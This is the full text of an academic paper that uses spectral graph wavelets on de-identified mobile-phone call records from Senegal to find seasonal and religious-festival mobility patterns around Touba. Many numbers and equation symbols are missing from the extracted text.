the size and richness of these datasets is at the same time a blessing and a curse: while there is great opportunity to extract useful information from these datasets, it remains a challenge to do so in a meaningful way. in particular, human mobility is multiscale, meaning a diversity of patterns of mobility occur simultaneously, which vary according to timing, magnitude and spatial extent. to identify and characterize the main spatio-temporal scales and patterns of human mobility we examined cdr data from the orange mobile network in senegal using a new form of spectral graph wavelets, an approach from manifold learning. this unsupervised analysis reduces the dimensionality of the data to reveal seasonal changes in human mobility, as well as mobility patterns associated with large-scale but short-term religious events. the novel insight into human mobility patterns afforded by manifold learning methods like spectral graph wavelets have clear applications for urban planning, infrastructure design as well as hazard risk management, especially as climate change alters the biophysical landscape on which people work and live, leading to new patterns of human migration around the world. subjects agents and multi-agent systems, algorithms and analysis of algorithms, data science, network science and online social networks, spatial and geographic information systems keywords complex systems, manifold learning, human mobility, dimension reduction, prediction, geographic information science, multiscale, emergence, wavelet, networks introduction human mobility is a fundamental part of how individuals, households and communities organize to meet every-day needs, and to respond to infrequent risks and shocks like economic instability and environmental hazards. human mobility is multiscale in nature (song et al., a), that is for any given type of mobility, such as commuting, seasonal migration or holiday travels, individuals move as part of social collectives of varying size and interconnectivity, which span different magnitudes of spatial and temporal scale. human mobility also has multiple spatio-temporal modes of variability: people go to work each day, they go on holiday during specific programed periods within the year, they may how to cite this article watson jr, gelbaum z, titus m, zoch g, wrathall d. . identifying multiscale spatio-temporal patterns in human mobility using manifold learning. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted april published june corresponding author james r. watson, james.watson@oregonstate.edu academic editor chakchai so-in additional information and declarations can be found on page doi . /peerj-cs. copyright watson et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:james.�watson@�oregonstate.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ migrate before and after key agricultural seasons, or they may evacuate during floods or other environmental hazards (widhalm et al., ). for these reasons and others, it is a continuing challenge to identify, categorize and anticipate the various patterns of human mobility (simini et al., ). 
anticipating and planning for human mobility is a non-trivial task for organizations whose core functions provide critical services to and address the needs of moving people, such as urban planning and transport agencies, disaster first-responders and international aid organizations (jiang, ferreira & gonzalez, ). to overcome these challenges and generate fundamental insight on human mobility, novel data generated by users of the digital infrastructure (e.g., mobile phone subscribers) is now being used. so-called big data, routinely collected from a range of sources, including social platforms like twitter, flickr and facebook (barbosa et al., ) and most notably the explosion of mobile phone usage throughout the world, provides rich information on users’ locations through time (giannotti et al., ). mobile network operators collect records of their users’ calling patterns, a type of data called call detail records (cdr), which include the location of the receiving tower where each voice call or text message is made, as well as the location of the recipient. over time, each user’s calling patterns can be used to reconstruct a detailed record of their location history. the collective mobility history of all users’ movements through time provides insight on total population flows between all cellular network locations during any specified period of time. this enables the study of users’ behaviors at very high spatiotemporal resolution over both local and system-level spatial scales at time scales of minutes to months to years (song et al., b). as each phone is embedded within an existing social fabric, cdr allow the analysis of the changing structure of social organization as people (i.e., individuals, social networks, communities, religious and ethnic groups, etc.) respond to a diversity of stimuli. cdr data has been used for urban planning (becker et al., ), and to describe and evaluate commuting (iqbal et al., ) and environmental displacement resulting from earthquakes and hurricanes (lu et al., ; lu, bengtsson & holme, ). they have also been used to evaluate mobility as a vector for the spread of infectious diseases such as ebola (wesolowski et al., a, b; balcan et al., ; belik, geisel & brockmann, ). cdr data offer a vastly clearer and more detailed description of the communication and mobility behaviors of people as they go about their daily lives, compared to traditional data on human mobility, such as surveys and censuses, which are collected at relatively coarse time-scales, that is, months and years (bell & ward, ). cdrs are compiled by network operators principally for the purposes of billing customers for their use of the network, not for scientific analysis; therefore, the main challenge with analyzing cdr is the size, complexity and richness of datasets. cdr are inherently high dimensional and noisy (chen & zhang, ), and quantitative analyses must incorporate dimensional reduction and denoising approaches. once done, the remaining challenge is retrieving a relevant signal from the data at the appropriate spatial and temporal scale for each specific mobility pattern (song et al., b). here, we describe a data-driven approach to cdr analysis that explicitly addresses the multiscale nature of the mobility patterns embedded in the data and reflected in watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the system under study. 
we analyzed cdr from users of the orange/sonatel cellular network, collected in senegal between january and december (see fig. for an illustration of mobility in senegal for a given day). de-identified data entries included information on the time of the call, the mobile phone tower used and the duration of call. to identify and characterize different spatio-temporal modes of human mobility captured in cdr, we developed a novel computational approach based on spectral graph wavelets, an extension of classical wavelet analysis to the setting of networks. there are now numerous examples of where cdr data has been used to understand patterns of human mobility (jarv, ahas & witlox, ; calabrese et al., ; dobra, williams & eagle, ), including those that also explicitly address multiscale patterns (phithakkitnukoon, smoreda & olivier, ) using methods from statistical physics (lambiotte et al., ; simini et al., ). here, we have made new mathematical advances to spectral graph wavelets to improve upon these state-of-the-art approaches to the multiscale decomposition of cdr data. in doing so we were able to identify and characterize various multiscale spatio-temporal patterns of human mobility in senegal for the year . to demonstrate the utility of our approach we focused on dynamic multiscale mobility patterns to/from a specific city in senegal: touba, a market town and religious center in senegal's agricultural breadbasket. our goal was to identify and characterize the different spatio-temporal patterns of human mobility that contrast in overall spatial scale and temporal duration. we focus on inter-city forms of mobility to/from touba, including seasonal migration relating to changes in agriculture and a mobile labor force, as well as punctuated patterns relating to calendar festivals, local elections, or religious holidays. the identification and interpretation of these spatio-temporal scales and patterns of human mobility is of value to the ultimate goal of extracting key dynamics from complex adaptive systems in general.

figure : map of senegal with major cellular communication towers: these are the nodes in our human mobility networks. nodes are color coded and sized by population density and edges connecting them highlight the density and complexity of human communication and mobility networks. these networks are changing over time, and in senegal there are many large-scale mobility events, relating to religious events (often held at touba, the focal city of this study) as well as to seasonal changes in weather and agriculture.

methods

human mobility data

to analyze the multiscale nature of human mobility, we developed a new approach to spectral graph wavelets which we then applied to de-identified, pre-processed extracts of cdr from the orange/sonatel mobile network in senegal generated between january and december , . these data were obtained from the orange telecom data for development challenge (d d) and are highly sensitive. as a consequence they cannot be made publicly available, but can be obtained by contacting orange. these data include a number of variables on individual mobility behaviors/locations for , randomly sampled users on a rolling -week basis.
these data were arranged into a pairwise origin-destination network whose vertices, or nodes, are cell towers and whose edges are weighted by the volume of phones moving/flowing between each tower pair for each -h period over the entire year of . to highlight inter-city mobility, we first aggregated the cell towers of key cities into single nodes, following administrative boundaries. then, for each h period, a one was added to a given edge i,j if a phone moved from node i to node j. to further filter out intra-city mobility, repeated trips between the same towers for the same user within a -period were not counted. this effectively removes “double” trips, and leaves the one-way trips, for example home-work commutes. after all this, mobility was defined and quantified as an asymmetric affinity matrix a varying through time, where aij(t) is the total number of unique trips made by users between towers i and j on day t of (see fig. a for a geographic representation for one of these daily affinity matrices). in order to normalize the data so that the signal from high volume mobility in areas such as dakar, the capital of senegal, did not wash out all other signals, we calculated relative mobility by dividing the entries of a(t), by their respective row sums. in this way the number of trips on a given day from a given node are now weighted by the amount of people moving from that node. in order to perform the sgw analysis, we then converted this asymmetric affinity matrix to a symmetric one by taking the average of two-way mobility patterns between pairs of cell-towers. last, so as to not include intra-city traffic, we set the diagonal of a to zero. the result was a symmetric affinity matrix/network with zeros on the diagonal for every day of . multiscale analysis using spectral graph wavelets networks of human mobility and communication are naturally modeled by graphs, sets of nodes connected by edges, each with an associated weight representing the strength of the connection. here, higher edge weights indicate a greater flow of human migration watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between the edge’s two endpoints. graphs can be viewed as discrete analogs of smooth objects such as geometric manifolds and surfaces, and the geometric content of these graphs is often analyzed using an associated laplacian operator (chung, ; coifman & lafon, ), as it encodes the structure of the graph in a natural way. in particular, its eigenfunctions can be used to construct a family of wavelets, which allows one to decompose functions in the same spirit as the indispensable fourier analytic approach to time series analysis. this is the starting point of our study. in fourier analysis, one uses eigenfunctions {ϕk} of the laplacian as basis vectors and their associated eigenvalues {λk} inform us of the functions’ features: larger eigenvalues are associated to higher frequency or, equivalently, smaller scale variations, and lower eigenvalues correspond to the large-scale features. these functions ϕk are, however, supported across the entire domain in question, and so a function’s fourier coefficients ck ¼ hfk; f i, integrate features from disparate regions in the domain. wavelet families, on the other hand, allow one to perform a similar analysis while restricting attention to a local region defined by a central point and a scale, or radius. 
given that human mobility networks are inherently multiscale as well as highly heterogeneous, a method is required that is both multiscale and localized. in the classical settings of time series analysis and image analysis, wavelets were developed to exhibit precisely these two traits. here we employed a generalization of wavelets to graphs, called spectral graph wavelets. spectral graph wavelets have been previously used to study human mobility, for example automobile traffic (mohan et al., ), in analyzing human mobility from photo activity via flickr (dong et al., ), and in general clustering and community detection (tremblay & borgnat, ). an important first choice to make when employing spectral graph wavelets is the shape of the wavelet to be used, or in other words the “wavelet kernel". this can have a profound effect on the analysis. in particular, we employed a wavelet kernel based specifically on the heat kernel yielding what we call hermitian graph wavelets (for details of the mathematical analysis see: gelbaum, titus & watson, ), which allows us to associate explicit radii to the wavelets rather than a scale parameter that is independent of any metric on the graph. by using these wavelets, we were able to produce a data analysis method that efficiently extracted key geometric information from the time-varying human mobility networks a(t). this approach provides a decomposition whose components may be ordered by importance. whereas in a fourier decomposition the largest coefficients ck indicate the eigenfunctions which contain most of the original function’s information, in the present study the norm of the wavelet gives a measure of the gross data encoded by it. the outputs of this analysis are a set of wavelet functions associated to each vertex (i.e. for every cell tower in senegal), as well as a single dominant scale for each vertex representing the scale containing the most information for that vertex. by fixing a choice of vertex and observing how the wavelet at the dominant scale evolves over time we have a vastly simplified geometric summary of how the graph structure is changing near the focal vertex. as a result, these wavelet functions are rich in multiscale geometric content, and we used watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ them to identify and characterize different forms or modes of human mobility that occur throughout senegal over the year . applying spectral graph wavelets to mobility networks given the set of daily affinity matrices, a(t), the application of spectral graph wavelets is as follows. first, for each of the daily affinity matrices, we constructed their associated laplacian matrices: dðtÞ ¼ dðtÞ � aðtÞ where dðtÞii ¼ p j ðaðtÞÞi;j and d(t)ij = for i ≠ j. once done, the eigenvectors and eigenvalues of δ(t), {ϕk,t} and {λk,t} respectively, were then computed. then, hermitian graph wavelets were formed as: cs;xðyÞ ¼ x k s�kðtÞe�s�kðtÞfk;tðxÞfk;tðyÞ ( ) for a chosen set of scales s∈{sn} (note that ψs,x(y) = ψs,y(x)). these functions exhibit several properties that make them ideal for decomposing signals measured on large and complex networks: they are localized, in that they provide information for every node, and the power of each wavelet (i.e., its norm, as a vector) gives us a measure of its importance with respect to the global network structure (gelbaum, titus & watson, ). 
this is analogous to classical fourier analysis where large fourier coefficients in the decomposition of a function indicate the major modes comprising the function. rather than forming an orthonormal set, the wavelet functions {ψsn,x} form a frame and rather than the classical parseval equality, an approximate parseval equality holds: for a function f on the network there are constants < b < c < ∞ with bkf k � x sn;x jhf ; csn;xij � ckf k where kf k ¼ x x jf ðxÞj with the sum taken over all nodes x in the network. the values of b and c depend both on choice of wavelet kernel and the scales chosen. it is always possible to choose scales and (by renormalizing if necessary) achieve a frame with the values of b and c as close to as desired (hammond, vandergheynst & gribonval, ). the determination of the scales {sn} input into the algorithm is largely ad hoc and some trial and error is required. while it is up to the investigator to make this choice, some general points can be made: the chosen scales should always be positive and the largest should not be too much bigger than the largest eigenvalue. the goal is to get a good partitioning of the interval [ , max {λ(t) }] relative to the spacing of the eigenvalues, but as the eigenvalues are in general not uniformly spaced some experimentation may be required to find the resolution that is most informative. having a well distributed set of scales will also ensure that the watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ calculation of wavelet power is not sensitive to small changes in the network’s structure or the specific scales chosen. in other words, calculations will be stable. with an appropriately chosen set of scales, if we let f be a delta function at node z, f = δz(meaning f(z) = and f(x) = for all other nodes x ≠ z), the above parseval bounds and ψs,x(y) = ψs,y(x) symmetry imply that ¼ kf k � x sn;x jhf ; csn;xij ¼ x sn x x jcsn;zðxÞj ¼ x sn kcsn;zk thus the values of ||ψsn,z|| serve to indicate the relative importance of each scale with respect to the vertex z. in this way, large values of ||ψsn,z|| correspond to the major scales of importance at the node z. we utilize this intuition and define the dominant scale at each vertex to be sðz; tÞ ¼ arg maxsnkcsn;zk ( ) this measures the scale at which a given vertex is most well-connected to the rest of the network. the above hermitian graph wavelet functions yield a multiscale analysis at each vertex in the graph (i.e., for every cell tower in senegal). to highlight the ability of spectral graph wavelets to identify multiscale patterns, we chose to build our wavelets with a fixed base point at the vertex corresponding to the city of touba (denoted xt), and track the scale of the dominant wavelet function s(xt,t) as above, through time. we abbreviate this as s(t). we thus obtain a sequence of dominant wavelet functions on the network ψs(t),xt(t,y), where the first argument indicates the dependance on the changing network structure encoded in a(t) and the second argument y corresponds to vertices of the graph on which the function takes its values. 
results to demonstrate the utility of spectral graph wavelets for identifying the main spatio-temporal scales and patterns of human mobility, we calculated dominant wavelet functions centered on touba, the market city in senegal’s central breadbasket and an important site for religious festivals, and compared results with those produced from a basic analysis of the original population flow data. more specifically, for any given day, human mobility to/from a given location can be extracted from the mobilitymatrices a(t) and visually inspected (fig. a). doing so for touba, one finds that large cities such as dakar on the west coast account for most of the total daily flow in and out of touba (i.e., compare the location of large red nodes in fig. a). in contrast, fig. b depicts the dominant wavelet function for the same day as plotted in fig. a. the function ψs(t),xt(t,y) revealsa distinct spatial pattern, with a large positive value centered on touba, that rapidly diminishes to negative values in surrounding nodes, before approaching zero at geographically remote nodes. we note that despite the fact that the wavelet function was calculated using only the population flow data, and not any explicit spatial distance between location pairs, the dependance of human traffic on the watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ distance traveled (i.e., the proximity of touba to other locations) is apparent in the resulting wavelet function. in other words, we are observing a strong spatial autocorrelation in human mobility levels, which is both intuitive and expected. figure (a) cell-towers (i.e., human mobility nodes) in senegal color coded by the log number of people moving to/from touba on a random day in , and sized by local population density. (b) in contrast, colors now denote the dominant wavelet function centered on touba for the same day. here, node size remains proportional to local population density. the two maps reveal very differ- ent information. in (a) mobility to/from the major urban hubs, such as dakar the capital, are identified and in (b) the shape of the dominant wavelet function is highlighted: wavelet function values are positive at touba (the large red node near the center of senegal) decreasing to large negative values in nearby towns, before becoming less negative at far-off towns). full-size doi: . /peerj-cs. /fig- watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to characterize changes in human mobility through time, focusing on touba, we first examined changes in the total traffic to/from touba over time (fig. a); this is calculated by summing the mobility values to/from touba at all locations for each day (i.e., taking a row-sum of a given affinity matrix a(t)). log total mobility to/from touba over time reveals a variety of qualitative features, most striking is a large peak in traffic corresponding to the commemoration of touba’s mosque’s th anniversary, which occurred may th, (day ), as well as the end of ramadan august th, (day ) and eid al-adha on october (day ). we then clustered days based upon origin-destination flow values in a(t). for each day the vector of mobility values to/from touba were extracted from the mobility matrices a(t). we clustered days based on these values, using the louvain method for community detection (blondel et al., ). 
this involved calculating the euclidean distance between days based on their mobility values, and running the algorithm numerous times because it is non-deterministic. we chose the louvain method primarily because it provides an objective determination of the number of clusters. this is in contrast to other common clustering approaches, which require the number of clusters to be chosen a priori (e.g., k-means). a sensitivity test of the louvain method, as well as of other community detection/clustering approaches, is provided in the supplemental material.

figure (a) time-series of the log total mobility to/from touba, colored by group id produced from clustering days based on their mobility values. this cluster analysis identifies mobility associated with the dry (green) and wet (blue) seasons (with a transitional phase in gray), and there are peaks in total traffic to/from touba that correspond with major religious events at day , and ; however, the cluster analysis does not recognize these events as distinct. (b) in contrast, changes over time in the scale associated with the dominant wavelet function (centered on touba) better reveal the punctuated and large-scale mobility events related to religious celebrations (vertical red lines) and senegal's independence day (blue vertical line). in addition, using these dominant wavelet functions to cluster days extracts meaningful information about seasonal migration (points in green and blue), as well as the short-term/large-spatial-scale events (points in gray).

clustering these mobility data for touba identified two main time periods, corresponding to seasonal changes in senegalese weather and agriculture, as the rainy season begins around september. there is a third cluster corresponding to a short intermediate period (see fig. a; changes in the marker color: green, gray and blue correspond to the dry, intermediate and wet seasons, respectively). interestingly, the clustering only picked out these long-term changes in mobility, and not the short, punctuated events relating to religious festivals or political events. this is because, while these kinds of short-term events are associated with a change in total traffic to/from touba, any topological changes in the inter-city traffic profile are obscured by the complexity and irregularity of the data.

in contrast to these results created by analyzing the raw mobility values, clustering dominant wavelet functions over time revealed more nuanced information about mobility in senegal. clustering was done using ψ_{s(t),x_T}(t, y) in place of population flow values: we calculated the euclidean distance between daily pairs of touba-centered wavelet functions, before using the louvain community detection algorithm to identify clusters. like the analysis of the relative population flow values described above, this clustering of daily wavelet functions identifies changes in human mobility relating to the dry and wet seasons. importantly, however, the presence of relatively short-term and large-scale events was now identified throughout the year. these events are marked by a short-term widening of the wavelet function centered on touba (in network space), and correspond to the three religious migration events listed above.
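a minimal sketch of this day-clustering step is given below. it is an illustration only: the gaussian similarity kernel, the k-nearest-neighbour sparsification and all names are our assumptions rather than the authors' exact settings, and the louvain routine shown is the one shipped with recent versions of networkx.

```python
import numpy as np
import networkx as nx
from scipy.spatial.distance import pdist, squareform

def cluster_days(day_vectors, k=10, seed=0):
    """day_vectors: (n_days, n_nodes) array whose row t is either the raw
    mobility to/from Touba on day t or the Touba-centred wavelet function for
    day t.  Builds a similarity graph over days from pairwise Euclidean
    distances and partitions it with Louvain community detection."""
    D = squareform(pdist(day_vectors, metric="euclidean"))
    sigma = np.median(D[D > 0])                  # kernel bandwidth (assumption)
    W = np.exp(-(D / sigma) ** 2)
    np.fill_diagonal(W, 0.0)
    G = nx.Graph()
    for t in range(len(W)):                      # keep each day's k strongest links
        for u in np.argsort(W[t])[-k:]:
            G.add_edge(t, int(u), weight=float(W[t, u]))
    # Louvain is stochastic; in practice it is rerun and checked for stability
    return nx.community.louvain_communities(G, weight="weight", seed=seed)
```

running the same routine once on the raw daily flow vectors and once on the daily wavelet functions yields the two clusterings that are contrasted below.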
in addition, other events are identified: the maouloud/gamou celebration that occurred in january (day ) and independence day that occurred in april (day ). there are two extra events that this clustering approach identified, around day and at the end of the year. the former is an unknown event; the authors do not know of any political, religious, or cultural gathering that occurred near touba at that time, though we note that the absence of evidence is not evidence of absence. indeed, the similarity of the network structure at that day to that of other verified major migrations is a strong motivator for further investigation. the latter date, at the end of the year, is likely associated with new-year celebrations/holidays. crucially, the total traffic to/from touba does not change during many of these events, and they are not identified by clustering the relative population flow data; the scale of the dominant wavelet functions fluctuates due to changes in connectivity within the network, and this manages to distinguish between typical traffic patterns and migration events.

averaging the daily wavelet functions associated with each cluster (i.e., producing an average dominant wavelet function centered on touba for the dry and wet seasons, and for each short-term/large-scale event) reveals stark spatial differences (fig. ). for example, the absolute difference between the average wavelet functions relating to the dry and wet seasons (fig. a) identifies change in several coastal towns (along with changes in mobility in and around touba). these changes reflect two processes. first, in senegal there is a large and mobile agricultural work-force; seasonally employed farm laborers from the coast use touba as a stepping stone to rural locations in the interior of the country. second, floods are also associated with the start of the rainy season, and that year the coast experienced significant flooding. these differences in the average wavelet functions associated with the dry and wet clusters also reflect the impact of the floods on human mobility.

additional nuances emerge in the punctuated modes of mobility associated with the religious festivals noted earlier. in contrast to the seasonal changes in mobility, the absolute difference between the average wavelet function associated with short-term/large-scale events, in this case eid al-adha in october (day ), and the wet season identifies change in mobility to/from many small rural towns in the far east of senegal (fig. b). these differences in average dominant wavelet functions clearly identify the long-distance travel that people make as they go to/from touba for the religious event. this kind of geographically meaningful information can be used to explore differences in the various modes of human mobility found by clustering daily wavelet functions. in general, this approach more readily reveals heterogeneous spatial and network features, relative to results produced from the analysis of the relative population mobility values, which simply described major seasonal changes in flows to/from touba. importantly, it bears noting that while we present results from touba, the spectral graph wavelet analysis also characterizes the main spatio-temporal scales and patterns of human mobility for every node within the network.
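the per-cluster averaging and mode comparison just described amounts to a few array operations; the sketch below (our names, assuming the daily touba-centred wavelet functions are stacked as rows of an array) shows the computation whose output is mapped in fig. .

```python
import numpy as np

def cluster_mean_wavelets(day_wavelets, clusters):
    """day_wavelets: (n_days, n_nodes) array of Touba-centred dominant wavelet
    functions; clusters: iterable of sets of day indices (e.g. Louvain output).
    Returns one average wavelet function (a vector over nodes) per cluster."""
    return [day_wavelets[sorted(days)].mean(axis=0) for days in clusters]

def mode_difference(mean_a, mean_b):
    """Node-by-node absolute difference between two average wavelet functions,
    e.g. the dry-season and wet-season modes; plotted geographically, this
    highlights where the two modes of mobility differ."""
    return np.abs(mean_a - mean_b)
```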
hence, while we have demonstrated its utility with regard to touba, there is additional spatially meaningful information that we did not show or analyze.

figure main spatio-temporal patterns of human mobility can be identified by averaging the dominant wavelet functions associated with the cluster groups shown in fig. b. these modes of human mobility can then be compared by calculating their absolute difference and plotting it as a map. (a) the absolute difference in the average dominant wavelet function (centered on touba) associated with the dry and wet seasons highlights changes in mobility to/from the coast and touba. (b) the absolute difference in the average wavelet function (centered on touba) associated with religious events and the wet season reveals changes in mobility in far-off towns in the east of senegal, and touba.

discussion

to improve upon current abilities to characterize changes in human mobility over time, we developed and applied a new manifold learning method based on spectral graph wavelets (i.e., hermitian graph wavelets) to a cdr dataset. these data describe the origin-destination mobility patterns for people living in senegal, daily over a full year. our approach is non-linear, localized and scale explicit; that is, it can be used to identify multiscale patterns of human mobility for each node in a mobility network. this is key to disentangling multiscale patterns with big and rich datasets like those produced by cdrs. spectral graph wavelets applied to these data allowed us to identify seasonal changes in senegalese human mobility, as well as punctuated large-scale events relating to religious migration and a national holiday. these short-term but large-spatial-scale events were not identified by a standard approach applied to the original mobility values themselves (i.e., a(t)), because those data contained too much noise. as a consequence, our spectral graph wavelets approach provides a new method for the multiscale decomposition of human mobility data, and expands the utility of cdr data for anticipating and preparing for changes in human mobility.

identifying the main patterns of human mobility, and the spatio-temporal scales at which they occur, is an important part of developing policies for a whole host of operations, ranging from traffic infrastructure to disaster response planning (jiang, ferreira & gonzalez, ). these kinds of spatial policies have previously been made using far coarser data, both spatially and temporally (bell & ward, ). here, making use of relatively high resolution cdr data, we were able to tease out the spatial signal of punctuated large-scale events, in contrast to a standard approach applied to data on population flow values. the rate at which new data are created, always at higher temporal frequency and greater spatial resolution, is ever growing, and the quantitative tools used to extract useful information from monthly or even annual datasets are rapidly diminishing in utility (lee & kang, ). for the best use of these new data (i.e., next-generation cdr datasets) new tools are required, and indeed, tools that can articulate the complex and adaptive nature of human mobility have extreme utility (scheffer et al., ).
like human mobility, other complex adaptive systems are multiscale by nature (levin, ), and in general there is a growing need to extract information about the micro-scale agents that comprise these systems, from which meso- and macro-scale patterns emerge (folke, ). data-analytic tools designed with the multiscale nature of complex adaptive systems in mind will help policy makers develop plans that explicitly account for the emergence of patterns over a continuum of scales, as in this case the various modes of human mobility in senegal and their associated network/geographic scale.

the use of spectral graph wavelets allowed us to essentially transform the origin-destination mobility data (i.e., a(t)) to a form that better highlights the differences among human mobility patterns. in that spirit, this analysis can be thought of as a process of dimensional reduction or a denoising of the raw data, in a manner that accounts explicitly for network scale. analyzing the raw mobility data did not provide the same kinds of scale-dependent information because it is noisy. admittedly, when analyzing the mobility matrices a(t) we used a very basic approach to classification. there are indeed many other more sophisticated approaches that we could have employed, in order to contrast with the results produced from analysis of the dominant wavelet functions. these approaches vary from traditional dimensional reduction techniques that rely on linear correlations, such as principal components analysis (pca), to machine learning approaches for feature identification (bi et al., ). indeed, we see a great opportunity for using the wavelet-transformed data in combination with machine learning approaches to classification and feature extraction.

the multiscale and localized information that spectral graph wavelets provide can be used in many other ways. here, we have analyzed human mobility information gained from the cdr data, but the cdr dataset can also be used to construct human communication networks through time. performing the same analysis on both sets of data would produce concurrent wavelet functions through time. a comparison of changes in the main spatio-temporal scales and modes of human communication and mobility might reveal early-warning signals of migration/displacement. simply put, as people prepare to move they are likely to call their ultimate destination, and this information can help policy makers prepare for changes in population density at specific nodes/places. there is an opportunity to utilize methods from manifold matching (shen, vogelstein & priebe, ) to make these comparisons. manifold matching has been used in image recognition to match photos of the same person, for example. here, instead of a set of photos of a person's face, the manifolds that would be compared are those associated with a complex system (the senegal cellular network) described in two ways (i.e., communications and mobility).

early detection of large-scale human migration is evident in our analysis. for example, in fig. b, the days with large wavelet scale (i.e., the gray dots) often precede the date of the event (i.e., the vertical red lines). this suggests that our method could provide quantitative measures of "anomalous" mobility patterns associated with these events.
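one way to operationalize such an anomaly measure, elaborated in the next paragraph, is to compare each day against a trailing baseline. the sketch below is only an illustration: the window length, the use of a euclidean distance and all names are our assumptions.

```python
import numpy as np

def anomaly_scores(day_wavelets, window=28):
    """day_wavelets: (n_days, n_nodes) array of daily dominant wavelet functions.
    Each day is compared with the average wavelet function of the preceding
    `window` days; large distances flag days whose mobility structure departs
    from the recent baseline."""
    scores = np.full(len(day_wavelets), np.nan)   # undefined for the first `window` days
    for t in range(window, len(day_wavelets)):
        baseline = day_wavelets[t - window:t].mean(axis=0)
        scores[t] = np.linalg.norm(day_wavelets[t] - baseline)
    return scores
```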
for example, one could compare a given day's dominant wavelet function with an average wavelet function constructed from the preceding week or month. this is similar to, but contrasts with, what we have done here comparing seasonal patterns of mobility. in doing so, one could compute how anomalous a given day is relative to recent times. this approach to anomaly detection is common, but the use of our hgw method to predict unknown oncoming events from cdr data would be novel.

additional early-warning signals of mass human mobility can also be sought from the dynamics inherent to mobility networks alone. these kinds of early-warning signals come from dynamical systems and bifurcation theory (scheffer et al., ) and are measured by changes in the variance and autocorrelation of macroscopic variables (boettiger, ross & hastings, ), for example changes in the density of people in a certain neighborhood. for human mobility cdr data, there is an opportunity to advance new early-warning signals of multiscale change using manifold learning. specifically, spectral graph wavelets are one way to learn changes in the geometry of the manifold on which dynamics occur, but there are others, for example diffusion maps (coifman & lafon, ) and laplacian eigenmaps (belkin & niyogi, ). systems undergoing a bifurcation driven by some macroscopic variable should a fortiori exhibit changes in geometry at small and intermediate scales as well; a multiscale analysis may then allow one to directly address how these kinds of large and abrupt changes in complex systems are related to changes in the behavior of micro-scale agents (i.e., in this case, how individual people move from place to place).

identifying the main spatio-temporal scales and patterns of human mobility, and potentially early-warning signals of changes between them, is of principal interest to groups tasked with managing human communities (jiang, ferreira & gonzalez, ), as people go about their everyday lives as well as respond to infrequent but impactful events like a natural hazard. in senegal, flooding is a persistent problem, and indeed the capital dakar was severely hit. these kinds of events can lead to the permanent displacement of people from their homes, and similarly to identifying the main spatio-temporal scales and patterns of human mobility as done here, there is value in identifying where and when this displacement occurs (xie et al., ). indeed, displacement is not necessarily instantaneous with regard to the perturbation; it may take a relatively long time for people to "realize" their displacement (black et al., ). multiscale methods like spectral graph wavelets applied to cdr data can help distinguish these additional modes of human mobility, and further, methods from manifold matching are likely to be useful too.

in sum, we have made advances to spectral graph wavelets (specifically hermitian graph wavelets) for analyzing cdr human mobility data. our approach extracts useful information that is localized and scale-explicit, and we identified seasonal changes in human mobility as well as punctuated large-scale mobility events associated with religious celebrations and a national holiday. here, we focused our multiscale analysis on one place in senegal, touba, a place of religious significance.
however, the spectral graph wavelet analysis produces information for all nodes in the network, and there is a rich vein of scale-explicit information in the full wavelet transform of the origin-destination mobility data. last, while the growth in data obtained for complex adaptive systems is daunting (scheffer et al., ), there are opportunities to employ new localized and scale-explicit dimensional reduction techniques, as we have done here, to greatly improve our ability to characterize and predict multiscale change. this ability is vital if we are to maintain the welfare we derive from the complex systems in which we are embedded.

additional information and declarations

funding
the authors received funding from the darpa young faculty award yfa n - - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: darpa young faculty award: yfa n - - - .

competing interests
the authors declare that they have no competing interests.

author contributions
- james r. watson conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- zach gelbaum conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
- mathew titus conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
- grant zoch performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
- david wrathall conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability: data are available as a supplemental file.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
balcan d, colizza v, gonçalves b, hu h, ramasco jj, vespignani a. multiscale mobility networks and the spatial spreading of infectious diseases. proceedings of the national academy of sciences of the united states of america.
barbosa h, barthelemy m, ghoshal g, james cr, lenormand m, louail t, menezes r, ramasco jj, simini f, tomasini m. human mobility: models and applications. physics reports.
becker ra, caceres r, hanson k, loh jm, urbanek s, varshavsky a, volinsky c. a tale of one city: using cellular network data for urban planning. ieee pervasive computing.
belik v, geisel t, brockmann d. natural human mobility patterns and spatial spread of infectious diseases. physical review x.
belkin m, niyogi p. laplacian eigenmaps for dimensionality reduction and data representation. neural computation.
bell m, ward g. comparing temporary mobility with permanent migration. tourism geographies.
bi j, bennett k, embrechts m, breneman c, song m. dimensionality reduction via sparse support vector machines. journal of machine learning research.
black r, arnell nw, adger wn, thomas d, geddes a. migration, immobility and displacement outcomes following extreme events. environmental science & policy.
blondel vd, guillaume j-l, lambiotte r, lefebvre e. fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment.
boettiger c, ross n, hastings a. early warning signals: the charted and uncharted territories. theoretical ecology.
